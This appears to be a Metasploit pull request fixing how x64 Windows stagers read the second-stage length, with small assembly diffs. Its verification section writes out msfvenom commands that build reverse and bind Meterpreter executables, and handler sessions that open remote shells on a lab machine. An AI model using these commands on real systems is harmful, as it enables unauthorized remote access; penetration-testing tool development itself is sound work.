### PR TITLE
Fix #5988, windows x64 stagers

### DIFF
--- a/external/source/shellcode/windows/x64/src/block/block_recv.asm
+++ b/external/source/shellcode/windows/x64/src/block/block_recv.asm
@@ -24,6 +24,7 @@ recv:
   add rsp, 32            ; we restore RSP from the api_call so we can pop off RSI next
   ; Alloc a RWX buffer for the second stage
   pop rsi                ; pop off the second stage length
+  mov esi, esi           ; only use the lower-order 32 bits for the size
   push byte 0x40         ; 
   pop r9                 ; PAGE_EXECUTE_READWRITE
   push 0x1000            ; 

--- a/lib/msf/core/payload/windows/x64/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp.rb
@@ -220,6 +220,7 @@ module Payload::Windows::BindTcp_x64
 
         ; Alloc a RWX buffer for the second stage
         pop rsi                ; pop off the second stage length
+        mov esi, esi           ; only use the lower-order 32 bits for the size
         push 0x40              ; 
         pop r9                 ; PAGE_EXECUTE_READWRITE
         push 0x1000            ; 

--- a/lib/msf/core/payload/windows/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
@@ -219,7 +219,7 @@ module Payload::Windows::ReverseTcp_x64
 
       ; Alloc a RWX buffer for the second stage
         pop rsi                 ; pop off the second stage length
-        movsxd rsi, esi         ; only use the lower-order 32 bits for the size
+        mov esi, esi            ; only use the lower-order 32 bits for the size
         push 0x40               ; 
         pop r9                  ; PAGE_EXECUTE_READWRITE
         push 0x1000             ; 


### PR DESCRIPTION
The X64 stagers where incorrectly popping 8 bytes as the length of the stage to receive. x64 reverse_tcp stager was fixed on #5637, but not the bind_tcp one.

Also this PR uses mov esi, esi instead of movsxd rsi, esi to save an extra byte, as pointed correctly by @kazabubu21 (thanks!)

```
mage00000001_40000000+0x4180:
00000001`40004180 5e              pop     rsi
0:000> dd rsp L1
00000000`0013fd00  0010e232
0:000> dq rsp L1
00000000`0013fd00  00000001`0010e232
0:000> t
image00000001_40000000+0x4181:
00000001`40004181 89f6            mov     esi,esi
0:000> r rsi
rsi=000000010010e232
```

Also, I've updated the block_recv.asm file, even when it isn't used anymore, worths to have it up to date while it lives there.
## Verification
- [x] Embed a reverse_tcp stager (64 bits into an exe) with msfvenom

```
$ ./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.158.1 LPORT=4444 -f exe -o /tmp/reverse.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Saved as: /tmp/reverse.exe
```
- [x] Use `exploit/multi/handler` to get a session, VERIFY you get it correctly

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...



[*] Sending stage (1106482 bytes) to 172.16.158.132
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:49175) at 2015-09-28 16:01:29 -0500

meterpreter >
meterpreter >
meterpreter >
meterpreter > getuid
syServer username: WIN-USPGTFV120Q\juan
meterpreter > sysinfo
Computer        : WIN-USPGTFV120Q
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter > exit
[*] Shutting down Meterpreter...
```
- [x] Embed a bind_tcp stager (64 bits into an exe) with msfvenom

```
 ./msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=172.16.158.131 RPORT=4444 -f exe -o /tmp/bind.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 484 bytes
Saved as: /tmp/bind.exe
```
- [x] Use `exploit/multi/handler` to get a session, VERIFY you get it correctly

```
msf exploit(handler) > set payload windows/x64/meterpreter/bind_tcp
set payload => windows/x64/meterpreter/bind_tcp
msf exploit(handler) > set rport 4444
rport => 4444
msf exploit(handler) > set rhost 172.16.158.132
rhost => 172.16.158.132
msf exploit(handler) > run

[*] Started bind handler
[*] Sending stage (1106482 bytes) to 172.16.158.132
[*] Starting the payload handler...
[*] Meterpreter session 2 opened (172.16.158.1:56603 -> 172.16.158.132:4444) at 2015-09-28 16:02:34 -0500

meterpreter > sysinfo
Computer        : WIN-USPGTFV120Q
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter > exit
```
